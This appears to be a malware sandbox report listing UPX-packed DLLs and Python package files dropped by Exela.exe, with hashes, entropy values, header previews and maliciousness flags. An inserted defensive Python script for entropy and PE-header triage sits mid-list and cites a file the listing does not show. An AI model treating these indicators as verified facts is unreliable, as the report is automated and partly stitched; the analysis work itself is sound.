                                                                                                  SHA-256:F3620CAC68595B8A8495AB044F19A1C89012F50D2FE571B7A1721485F7FF2E43
                                                                                                  SHA-512:61B8ECD2D12B3F785773B98D4BF4AF0EB6EB2C61FBEA6EFFB77EC24B2127E888D0EA5FDD8CC298484E0F770D70C87907048FC382FAACE8E0CA6B49AB106C89F8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|RTy..Ty..Ty..]...Zy......Vy......Yy......\y......Py......Wy......Vy..Ty...y......Uy......[y......Uy......Uy......Uy..RichTy..........PE..d...)..c.........." ...".p................................................... ............`.............................................P........................'......................................................@...........................................UPX0....................................UPX1.....p.......d..................@....rsrc................h..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34176
                                                                                                  Entropy (8bit):7.670946753848895
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:aW3dM1TMhvg8KNML5TOuzSsI/LpazI75ImyYiSyvfPxWEabVV/:aQdM1TMho8iMLPmv/AzI75Imy7SyXPxA
                                                                                                  MD5:3B5530F497FF7C127383D0029E680C35
                                                                                                  SHA1:FB5DC554BB9FF49622184CC16883A7567115C7CA
                                                                                                  SHA-256:5971FCC9758B7F4A12CDE2190A323F35A34AB7F97BD8C39CC8F3335223102573
                                                                                                  SHA-512:12CED7DDB0352F8ECA3C3CB7C7C2FAAF08E617B2DD278D20008051FB6B564B17C3E9ECFA8B0FFE7674154AD533DFBBF1E802ACCD5E1AEF12ECE01368DA06E85A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.A.>...>...>...F2..>...B...>...B...>...B...>...B...>..iB...>...L...>...D...>...>..Q>..iB...>..iB...>..iB^..>..iB...>..Rich.>..........................PE..d.../..c.........." ...".P..........p........................................@............`..........................................;..P....9.......0.......................;......................................p*..@...........................................UPX0....................................UPX1.....P.......L..................@....rsrc........0.......P..............@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):86392
                                                                                                  Entropy (8bit):7.91766123352546
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:EnKvmqFMCNL6eKmtYs76LBlBqLBxcZiV6IHxdc/k4Nc+VI7e1gf7SyJPxs:kqdLCOz76LBl4VxYcdc/11I7e1gfvxs
                                                                                                  MD5:8EDBEECCB6F3DBB09389D99D45DB5542
                                                                                                  SHA1:F7E7AF2851A5BF22DE79A24FE594B5C0435FCA8A
                                                                                                  SHA-256:90701973BE6B23703E495F6A145BAE251A7BB066D3C5F398EC42694FD06A069F
                                                                                                  SHA-512:2A8BF60F2280B9A947578BD7FD49C3ACE8E010A3D4B38E370EDB511EA0E125DF688BBAC369D6A3CEC9D285A1FA2AD2DAC18A0EF30FDA46E49A9440418581E501
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.J[&.$.&.$.&.$./..".$.i.%.$.$.i.!.*.$.i. ...$.i.'.%.$...%.%.$...%.$.$.&.%.C.$...)...$...$.'.$.....'.$...&.'.$.Rich&.$.........PE..d...B..c.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25984
                                                                                                  Entropy (8bit):7.488187631590162
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:GQy6HNbpr+8C6LSf93zpALbI7Rt2fYiSyvPPxWEa5Z:L9+8FKReLbI7Rt2f7SynPxeZ
                                                                                                  MD5:4FBC5FD5DA9DA74C04FE0374387B34D3
                                                                                                  SHA1:1E9C98DB0486F98FB7D8EB9FA57A949494B649B5
                                                                                                  SHA-256:B2347790C87052623710382D3178887F68A79618D6DA5174909F46B169236950
                                                                                                  SHA-512:CE87D4512C2AB7C1AD7986E8E1FE790615AE39C7667D234DFC09026EE7E1518B3BFBF7974612811DB0C3E5654B35B54E118E23E624BEBE027A51D2C8F2A4652A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$Z*.E4y.E4y.E4y.=.y.E4y.95x.E4y.91x.E4y.90x.E4y.97x.E4yS95x.E4y.E5y.E4y?75x.E4yS99x.E4yS94x.E4yS9.y.E4yS96x.E4yRich.E4y........................PE..d...+..c.........." ...".0..........p.....................................................`.........................................4...`....................`..........................................................@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
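The DLLs Exela.exe drops above share a pattern worth reproducing offline: every one is flagged Malicious:true by the sandbox while ReversingLabs reports 0% detection, the "Entropy (8bit)" field sits between 7.4 and 7.9, and the previews show UPX0/UPX1 section names plus the "UPX!" trailer, i.e. UPX-packed PE32+ DLLs. The script below is an added example, not code from the Joe Sandbox report or from the Exela project: it computes the same 8-bit Shannon entropy the report lists, parses just enough of the PE header to recover the machine type, the DLL flag and the section names, and combines them into a packed/unpacked verdict. The 7.2 entropy threshold is an assumed triage heuristic, not a Joe Sandbox value, and `build_sample_pe` constructs a synthetic header-only blob so the script runs without any of the dropped files. Note the caveat the records themselves illustrate: the 109392-byte console DLL with entropy 6.64 and no UPX markers is not packed, so entropy alone is not evidence of packing.

```python
"""Offline triage of dropped PE files: 8-bit entropy, PE header facts, UPX check.
Added example; not part of the Joe Sandbox report."""
import math
import struct
from collections import Counter

IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x14C
# Assumption: a common triage heuristic, not a value taken from the report.
PACKED_ENTROPY_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0..8.0, the same quantity as the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(data: bytes):
    """Return (is_pe, machine, characteristics, section_names) from a PE image.

    Only the fields needed for triage are read; anything malformed yields is_pe=False.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, 0, 0, []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, 0, 0, []
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sect_off = e_lfanew + 24 + opt_size          # section table follows the optional header
    names = []
    for i in range(nsect):
        off = sect_off + 40 * i                   # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return True, machine, chars, names


def triage(data: bytes) -> dict:
    """Summarise one dropped file the way a first-pass analyst would."""
    is_pe, machine, chars, names = pe_sections(data)
    ent = shannon_entropy(data)
    upx = any(n.startswith("UPX") for n in names) or b"UPX!" in data
    return {
        "is_pe": is_pe,
        "x64": machine == IMAGE_FILE_MACHINE_AMD64,
        "dll": bool(chars & IMAGE_FILE_DLL),
        "sections": names,
        "entropy": round(ent, 3),
        "upx": upx,
        "likely_packed": is_pe and (upx or ent > PACKED_ENTROPY_THRESHOLD),
    }


def build_sample_pe(x64=True, dll=True, section_names=(b"UPX0", b"UPX1", b".rsrc"), body=b"") -> bytes:
    """Constructed minimal PE-like blob (DOS stub, COFF header, empty optional header,
    section table) for offline testing; not a real dropped file."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = b"\0" * 240                              # PE32+ optional header size; contents unused here
    machine = IMAGE_FILE_MACHINE_AMD64 if x64 else IMAGE_FILE_MACHINE_I386
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, len(opt),
                       IMAGE_FILE_DLL if dll else 0)
    sections = b"".join(name.ljust(8, b"\0") + b"\0" * 32 for name in section_names)
    return dos + b"PE\0\0" + coff + opt + sections + body


if __name__ == "__main__":
    # Run against a real dropped file with: triage(open(path, "rb").read())
    print(triage(build_sample_pe()))
```

On a real sample, compare `entropy` with the report's field and `sections` with the section names visible in the preview; a mismatch usually means the file on disk is not the one the report hashed, so check the MD5/SHA-256 first.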
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):31104
                                                                                                  Entropy (8bit):7.628398010929569
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:nk8GDYwKGtevarixdHpgTzI7st2xYiSyvxPxWEa:8ETibTzI7st2x7SypPx
                                                                                                  MD5:5C1441F6EE11632183A83DAC2D22853B
                                                                                                  SHA1:EEF732FF4BAB9EA5C8FFFB6A93C47CFC8E64DAE2
                                                                                                  SHA-256:104E0B0E0E9FEC9EB6438683296FEEBA298D5F23B02D2080577FC87FFEC67ACF
                                                                                                  SHA-512:E41D3433754A8A3D2C572BB7F3902C0D37CBA2E6F3307F0E6DFED316A22B11EF7E52A73C30085FA89FCFF603E4B76858ABE761217C320E38FA2EB95D1777B595
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24960
                                                                                                  Entropy (8bit):7.447047314489284
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pSxw19p9opxfI77U2bYiSyvlfUvPxWEl:pj1HgfI77U2b7SyOvPx
                                                                                                  MD5:5C4C43763FB1A796134AA5734905C891
                                                                                                  SHA1:44A5E1AE4806406A239129D77888BD87D291A410
                                                                                                  SHA-256:4EDC80E7D331BA0E9338431D407157181190F995821D1CD24F7A7AA2422ECE0C
                                                                                                  SHA-512:07BEC7E4A85E76CFAB2C21776B50EE2BD0454835FCB43B573DEE757ECA24CBEB4530784BAE07DE3BE90820CEE6D72023D9DED395D4F1A4931971DB247DC1A71E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):42880
                                                                                                  Entropy (8bit):7.696654190779553
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:EL7Syo5lzOt+ufVwPVXahccu0D+gFiPnmJqpE2SI7QwbmGYiSyvb9ZPxWEl:MkbzcKNGu0yXwN2SI7QwbmG7Syj/Px
                                                                                                  MD5:53E72716073038C1DD1DB65BFDB1254C
                                                                                                  SHA1:7BF220A02A3B51AA51300B3A9EA7FA48358CA161
                                                                                                  SHA-256:E1FB6927BA2ED014D0AC750AF0EE0BB3D49487DD6920848937259606E1E92E1D
                                                                                                  SHA-512:C10D91B6EC82402B0EB05DC31A4703C999F4988E88204B695E009FAE5FDCC61E8A6DC4D2879ECF2BABC030224048AFD2F256B9E7F5C5B6F28762047813BE0941
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50048
                                                                                                  Entropy (8bit):7.761194500415829
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:E8Mdv1OCWk0z+q3QCjbouWxI75Qr27SyDPx:XQO00zrrvbQI75Qr2Nx
                                                                                                  MD5:E7D68DF8F65FBB0298A45519E2336F32
                                                                                                  SHA1:AD3C84AD7EB75A61F287B1BA9FD2801567E39B6D
                                                                                                  SHA-256:2473EBAF52723C3751A12117EBBE974E50ECDAEB40B282A12BA4E6AA98492E79
                                                                                                  SHA-512:626204685E9B95310ABA51BE4A8ABAF3B6E152FA35902F64F837303FC4011A4518EE393047CEB45BF377E9D965D169C92BFBB6673475150E159C59B7857BA03E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):62328
                                                                                                  Entropy (8bit):7.84875298158187
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:wedJItp3BP6kGsJMthwMtbyG68yTyI7t7QO67SycPxu:98tVBPpGsUt+uyuI7t7Q/+xu
                                                                                                  MD5:7E9D95AC47A2284706318656B4F711D3
                                                                                                  SHA1:F085104709201C6E64635AEACF1DA51599054E55
                                                                                                  SHA-256:38DCB3D0F217785B39C03D4C949DD1E04B70E9EADE8A4AD83F026390684059C9
                                                                                                  SHA-512:294A5148D8FCDDABD177B776617DA7720D9876AC2A1CDF8DD7B9489F0F719600A634346CDFA07DA66588DE885B0A64D8CCCDE4D47EDBF6305BD2AF44EE209118
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22400
                                                                                                  Entropy (8bit):7.353729594367488
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:2bjUslT24oGuNZa7gJXTwI7ewWY8IYiSy1pCQDMaPxh8E9VF0Nyvzo:Mj3lcNpDwI7ewW4YiSyvfPxWEx
                                                                                                  MD5:59CFD9669367517B384922B2485CB6A7
                                                                                                  SHA1:1BD44298543204D61D4EFD2CD3980AD01071360D
                                                                                                  SHA-256:E02BFAD84786560B624EFD56DF55C88A4FFBD6C7CFC728BF68B6401AA10F849F
                                                                                                  SHA-512:D0DD041D8493C7C19DB01EA8477981148726796CE2AB58D3193064123319BD5B68FD57871D1DB0AAA08D07F78AB96A3D343051C33FFD406E96B921248EA32665
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):82944
                                                                                                  Entropy (8bit):7.938137486494663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:hnpRMSuB4GHqEE5Pr5YvebAN4QYt5dFcOGuj42OfIPZXSWItd2albgEM9xI:Vf04GXOzCvebAN4dia42OfIPJSzt
                                                                                                  MD5:23DF1D1A4BFD29C6C0F89D1A42BBECBB
                                                                                                  SHA1:B8E5686724223BD5E8ED0B7A3517CDC3005BE66A
                                                                                                  SHA-256:10F7967A3C574CAEA10FD5A94C9B6EBA405ED6AFEC402969424C143566593ADC
                                                                                                  SHA-512:75A455A9EB96BD52F0D795188A1120EE14D36944C331D97B4C3DA837238BD2928CFF29DF27C0F17093022D976C0C2E54189BABD94C6DC927AC325216C340481A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25088
                                                                                                  Entropy (8bit):7.665312753734398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:VCaWHS6ittmPMLRUZ+wXAMqCwTgs4A8mvcsxjntRNQi0VZa7gJXg4G:saWHSVtdtaQMvwTx4G7NYpQ
                                                                                                  MD5:B0E8CBF64F3728EEE12E6E0756E67C95
                                                                                                  SHA1:71BC5AE8847DAC5D0737E6321833A37DA655D538
                                                                                                  SHA-256:7A931C3108173C4D8CC4ED7304414FCD3BA67CEFF81F84506DCDDA8979F5F33B
                                                                                                  SHA-512:622126F5A1FC5E275680BB64648A8CAC6A5EAF3E7D6A262F0002AFC26CEC6D9C3ADDBBA257626AC54189B7F85E5ABDFC3809954CE0437046FC64B643A4E8CB5A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19968
                                                                                                  Entropy (8bit):7.541773953506371
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:9POtpIsoNR0zkLHI7KOqPwY8jT8Xr8MhHHxZa7gJXkoNT:9PO4hR0oLLwY7xp0o
                                                                                                  MD5:2B5D378AFB9AEB031ED1A84F5C216291
                                                                                                  SHA1:7955E2EC7E7FFA13E58AF098D37C480C8F23CCAD
                                                                                                  SHA-256:1D44B957609599FDF3115BB47BD668F560B63D4D84C74C1F7BF1F3DC05246D6A
                                                                                                  SHA-512:9102A95C57024AFDDB67B6500CE1606A2BF5923AA66F67E21FEC23C1EFB1C9A0CD77C55417B25C7CDBCDA119CD817EA4219A1FE321A2F9300F8BFFA99D8B0A31
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):62976
                                                                                                  Entropy (8bit):7.91306866032889
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ftmXfEKkKf3+XUbQdfdIvuVbSkTr9j4sCx74CKN3U/8o3rq3RSXqwnqpLL8gZET7:MXfEzPSGSkTrtGx7BWOv7q3RAF3gZEf
                                                                                                  MD5:2CB730463EE9A2360B568BB54FF283B1
                                                                                                  SHA1:E63B5D62D281F153AB2C3487F4423BEC259E1BD5
                                                                                                  SHA-256:17B026C18DC25B2F8842DA41484E39C8E92BD3FF9FE0F6D03F9FDC389991E7AE
                                                                                                  SHA-512:A7891BA2619CC6910C47FFAC153BA31A3B17F67F08654F7A1FED380B1F4951673573F5E5A59E45E4EDC432B135DBB57BB82C3B4CBDFC265D0DAA6FCA587AB732
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Mn:M
                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                  Malicious:false
                                                                                                  Preview:pip.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (411)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11654
                                                                                                  Entropy (8bit):5.225237436297847
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:WusRfi65kQk+kOkKkegJoiWiG/JDPVA1yzBdvrrOmoKT30oEJdQ/0G6lWg+JdQVg:WusQpLb3/oiWZ/JDP/zBdTrHoKD9gA6i
                                                                                                  MD5:0E682E7854FE836CAD441326AB36D36D
                                                                                                  SHA1:3EFAD7961F8F2DFB0A22A1EEABD3A92B9DA0AB23
                                                                                                  SHA-256:7FD8611027805324BB89EC073D1B8C2C3CB5B6927ABF2CBC47F4CA5270A6880F
                                                                                                  SHA-512:54FD3B0C98DCE7C11691D08CA22C9C8A74CD838D03723DDA3FBAC326EFC2550EDB892F9D45AA3956C9C5C35B8C20FE096F6A002DEE07150B437A1E7E76AC175A
                                                                                                  Malicious:false
                                                                                                  Preview:Metadata-Version: 2.4.Name: attrs.Version: 24.3.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifie
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3556
                                                                                                  Entropy (8bit):5.799825470471552
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:QtuulxJPJooDwKVE50dwB18XbXm9qG3R5YC3XFfkGD+qLtxO:+uIld418rXGPRWGXkiO
                                                                                                  MD5:72C9F466183F7EAE813F25ED47198941
                                                                                                  SHA1:7498FAE0D90F7F64D6C954849225E82C8F1BAC92
                                                                                                  SHA-256:A237DE627EE31B429FED81BDFF4FA5B5B22BC979A2580E1205ACAEDC78761143
                                                                                                  SHA-512:6ED2A1293FA6E27CA3BDAA95AF38E3B2299D1D77B7E0FB2D67552CD8F3ACAEE5BE94D4F3F562E6BC42E6F6C7FC9D302C7BD5B14A1243EF86979E077242173C35
                                                                                                  Malicious:false
                                                                                                  Preview:attr/__init__.py,sha256=fOYIvt1eGSqQre4uCS3sJWKZ0mwAuC8UD6qba5OS9_U,2057..attr/__init__.pyi,sha256=QIXnnHPoucmDWkbpNsWTP-cgJ1bn8le7DjyRa_wYdew,11281..attr/__pycache__/__init__.cpython-310.pyc,,..attr/__pycache__/_cmp.cpython-310.pyc,,..attr/__pycache__/_compat.cpython-310.pyc,,..attr/__pycache__/_config.cpython-310.pyc,,..attr/__pycache__/_funcs.cpython-310.pyc,,..attr/__pycache__/_make.cpython-310.pyc,,..attr/__pycache__/_next_gen.cpython-310.pyc,,..attr/__pycache__/_version_info.cpython-310.pyc,,..attr/__pycache__/converters.cpython-310.pyc,,..attr/__pycache__/exceptions.cpython-310.pyc,,..attr/__pycache__/filters.cpython-310.pyc,,..attr/__pycache__/setters.cpython-310.pyc,,..attr/__pycache__/validators.cpython-310.pyc,,..attr/_cmp.py,sha256=3umHiBtgsEYtvNP_8XrQwTCdFoZIX4DEur76N-2a3X8,4123..attr/_cmp.pyi,sha256=U-_RU_UZOyPUEQzXE6RMYQQcjkZRY25wTH99sN0s7MM,368..attr/_compat.py,sha256=4hlXbWhdDjQCDK6FKF1EgnZ3POiHgtpp54qE0nxaGHg,2704..attr/_config.py,sha256=dGq3xR6fgZEF6UBt_L0T-eUHIB4i43
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):87
                                                                                                  Entropy (8bit):4.730668933656452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:RtEeXAaCTShvxP+tPCCfA5I:Rt2PehvxWBB3
                                                                                                  MD5:E2FCB0AD9EA59332C808928B4B439E7A
                                                                                                  SHA1:07311208D4849F821E8AF25A89A9985C4503FBD8
                                                                                                  SHA-256:AAD0B0A12256807936D52D4A6F88A1773236AE527564A688BAB4E3FE780E8724
                                                                                                  SHA-512:D4CB3CA64D69678959C4F59B4D1CB992E8E2E046A6ACB92341FD30B8CE862BD81A48CBFA09EC9AE2E735FFEC5C12D246D1593A859615ADEE10984635A9BA8AF9
                                                                                                  Malicious:false
                                                                                                  Preview:Wheel-Version: 1.0.Generator: hatchling 1.27.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1109
                                                                                                  Entropy (8bit):5.104415762129373
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                  MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                  SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                  SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                  SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                  Malicious:false
                                                                                                  Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):880537
                                                                                                  Entropy (8bit):5.683031237524772
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YSZdOVwx/fpEh+rtSLMN2:lgYJiVBFLa2LuVwx/fpEh++MN2
                                                                                                  MD5:9B62388394601020BD24FA9E7B4E9E0A
                                                                                                  SHA1:06023DAF857014770FF38D4EBBD600BA03109F28
                                                                                                  SHA-256:A6993DB44FDE43C8FDBF3512DB50060812924C95F6F60AEB80913380A0B4F3E1
                                                                                                  SHA-512:AC1BFEBB36D844A0C5909B34FC1100FF2D1F88A0B71A75AA27B4D2B281A90DCB05259B874E4FDB300572A0C029DB96E507B5CAEFDAF03CC32050DC2B728C654B
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Mn:M
                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                  Malicious:false
                                                                                                  Preview:pip.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5724
                                                                                                  Entropy (8bit):5.120429897887076
                                                                                                  Encrypted:false
